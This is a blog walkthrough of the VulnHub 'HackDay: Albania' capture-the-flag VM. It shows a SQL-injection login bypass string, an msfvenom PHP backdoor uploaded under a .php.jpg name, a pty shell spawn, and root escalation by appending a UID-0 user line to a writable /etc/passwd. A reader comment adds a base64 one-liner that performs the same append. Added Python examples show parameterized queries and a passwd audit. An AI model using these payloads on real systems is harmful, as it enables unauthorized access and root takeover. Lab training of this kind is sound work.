Monday 5 December 2016

CTF HackDay: Albania - WalkThrough

Hey Readers,
So here I'm up with another CTF I've recently solved. It was kinda tricky (unexpectedly). But after irritating seniors with my problems related to it, I finally managed to solve it all :P

Download > https://www.vulnhub.com/entry/hackday-albania,167/


So first things first: determining the target. I scanned the network for live devices. (Our target had the IP "192.168.0.107".)

Alright, I did an intense scan on our target. Scanned the port range 0-10000 and finally ended up with 2 open ports: 8008 (Apache server) and 22 (SSH). Also I got some directories.

$ sudo nmap -T4 -A -v -p 0-10000 192.168.0.107


Dirs I got:

/rkfpuzrahngvat/
/slgqvasbiohwbu/
/tmhrwbtcjpixcv/
/vojtydvelrkzex/
/wpkuzewfmslafy/
/xqlvafxgntmbgz/
/yrmwbgyhouncha/
/zsnxchzipvodib/
/atoydiajqwpejc/
/bupzejbkrxqfkd/
/cvqafkclsyrgle/
/unisxcudkqjydw/
/dwrbgldmtzshmf/
/exschmenuating/
/fytdinfovbujoh/
/gzuejogpwcvkpi/
/havfkphqxdwlqj/
/ibwglqiryexmrk/
/jcxhmrjszfynsl/
/kdyinsktagzotm/
/lezjotlubhapun/
/mfakpumvcibqvo/
/ngblqvnwdjcrwp/
/ohcmrwoxekdsxq/
/pidnsxpyfletyr/
/qjeotyqzgmfuzs/

I then opened the link "192.168.0.107:8008", on which Apache was running, and got prompted with a message box "Ne qofte se jam UNE, e di se ku te shkoj" > Translated > "If I am, I know where to go".



I started visiting each dir and ended up with a meme :/


But there I found a directory named "unisxcudkqjydw" which had a slightly different page asking me to redirect to the page "/unisxcudkqjydw/vulnbank/" with the message "IS there any /vulnbank/ in there ???". I visited that link and got a login page of some "Vuln Bank".


I tried some random combinations for auth bypass, but unfortunately none of them worked, except one:

Username : " '
Password : " '

Got prompted with an SQL error. I thought it was my lucky shot :P and tried sqlmap and various other SQLi tools, but the result was negative :/


Finally I downloaded a username and password list and ran it through hydra. LOL, my fate really worked (I don't use hydra and hate brute-force attacks :/ :P).
I got a working combination:

Username : ' or 'a' = 'a' --
Password : #
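To show why that combination logs you in, here is an added example (not code from the VM or this post; the bank's real login is PHP/MySQL, so this uses an in-memory sqlite3 table with a constructed user as a stand-in). It puts the string-built query that the payload above defeats next to the parameterized query that treats the same input as plain data, and it also shows where the "SQL error" page comes from: a stray quote reaching the engine.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the bank's users table (sample data, not the VM's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse battery staple')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string formatting, so quotes in the input become SQL syntax."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Same query with bound parameters: the input is compared as data, never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def raises_sql_error(conn, login, username, password):
    """True if the login function lets a malformed query reach the database engine."""
    try:
        login(conn, username, password)
    except sqlite3.Error:
        return True
    return False


if __name__ == "__main__":
    conn = make_db()
    # The working combination from the walkthrough: the '--' comments out the password check.
    bypass_user, bypass_pass = "' or 'a' = 'a' --", "#"
    print("vulnerable   :", login_vulnerable(conn, bypass_user, bypass_pass))     # alice
    print("parameterized:", login_parameterized(conn, bypass_user, bypass_pass))  # None
    # A stray quote breaks the string literal in the vulnerable version and the engine
    # throws an error (the "SQL error" page); the parameterized one simply finds no match.
    print("error leak   :", raises_sql_error(conn, login_vulnerable, "admin'", "x"),
          raises_sql_error(conn, login_parameterized, "admin'", "x"))
```

Two things to take from this on the defending side: the fix is binding parameters, not filtering quotes, and a login page that echoes database errors to the user is itself a finding worth logging and alerting on, since probing with a single quote is exactly how this got noticed.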


Okay!! So I was finally seeing some hope of solving it :).

Tried uploading PHP files directly, but that didn't work. I immediately generated a PHP backdoor via msfvenom and renamed it with the extension ".php.jpg". Opened a handler and executed the payload by visiting the link where it was saved.


Then I just gained a bash shell with the command:

$ /usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'


I then checked all files and directories carefully to see if I could find some hint, but everything was useless. I thought config.php would work. I opened it and got the MySQL user and password (root credentials); I thought they could be the same credentials for the root user login too, but the result was negative.

After getting literally cooked up :P, I checked for writable dirs on the machine with the command:

$ find / -writable -type f 2>/dev/null

LOL, I noticed /etc/passwd was writable :P Bingo!! There I struck upon an idea ... "what if I manually add another user to the passwd file?" (Reference which helped me).

I then generated a password hash using openssl.

Username : dope
Password : dope


Now I just went back to meterpreter. Opened and edited /etc/passwd with the "edit" option. Added the new user at the bottom and saved the file:

dope:$1$MamNpKxX$/zIJhc75C0O9zRrTxxGYB/:0:0:test:/root:/bin/bash

The edited /etc/passwd just looks like:


Here I started to feel I'd be escalating to root privileges soon.

And finally, I ran the command "su", entered the password for the user I just made, and Boom!! It worked :P Finally I captured the flag :D

$ su dope
$ id
$ cd /root && cat flag.txt
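The whole escalation above relies on two things a defender can check for: /etc/passwd being writable by someone other than root, and an entry that is both UID 0 and carries its hash inline instead of in /etc/shadow. The following is an added example, written for this page and not part of the original post or the VM; it runs a small audit over a constructed sample file in the shape of the edited passwd (the hash value in it is a made-up placeholder, and the account names are invented) and checks the file mode the way the find command above would surface it.

```python
import os
import stat
import tempfile

# Constructed sample in the shape of the walkthrough's edited file (not the VM's real
# /etc/passwd): normal entries, one malformed line, and a UID-0 user with an inline hash.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
ops:x:1000:1000:ops,,,:/home/ops:/bin/bash
broken:x:1001:1001:/home/broken:/bin/sh
dope:$1$constructd$ThisIsAConstructedHash00:0:0:test:/root:/bin/bash
"""

# Values that legitimately appear in the password field when the hash lives in /etc/shadow
SHADOWED = {"x", "*", "!", "!!"}


def audit_passwd_entries(text):
    """Return (line_number, account, finding) tuples for suspicious /etc/passwd entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed entry, expected 7 fields"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if pw == "":
            findings.append((lineno, name, "empty password field, login without password"))
        elif pw not in SHADOWED:
            findings.append((lineno, name, "password hash stored in /etc/passwd instead of /etc/shadow"))
        if uid == "0" and name != "root":
            findings.append((lineno, name, "UID 0 account other than root"))
    return findings


def is_group_or_world_writable(path):
    """True when group or others have write permission on the file (what the find command reported)."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def demo_mode_check():
    """Write the sample to a temp file and check it at 0666 and then at the expected 0644."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        with open(path, "w") as fh:
            fh.write(SAMPLE_PASSWD)
        os.chmod(path, 0o666)
        loose = is_group_or_world_writable(path)
        os.chmod(path, 0o644)
        tight = is_group_or_world_writable(path)
    finally:
        os.unlink(path)
    return loose, tight


if __name__ == "__main__":
    for lineno, name, finding in audit_passwd_entries(SAMPLE_PASSWD):
        print("line %d  %-8s %s" % (lineno, name, finding))
    print("writable at 0666 / 0644:", demo_mode_check())  # (True, False)
    # On a live host the same two calls are:
    #   audit_passwd_entries(open("/etc/passwd").read())
    #   is_group_or_world_writable("/etc/passwd")
```

Wired into a cron job or a file-integrity monitor, either finding (a non-root UID 0 entry, or any hash sitting in /etc/passwd at all) is a high-confidence signal, because a correctly configured system never produces them on its own.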


Special Thanks to: VulnHub :) <3
Follow me on Twitter: https://twitter.com/Indi_g34r

1 comment:

  1. So I didn't use meterpreter... and I got hung... I ended up doing this:

    echo "ZG9wZTokMSRNYW1OcEt4WCQveklKaGM3NUMwTzl6UnJUeHhHWUIvOjA6MDp0ZXN0Oi9yb290Oi9iaW4vYmFzaA==" | base64 -d >> /etc/passwd
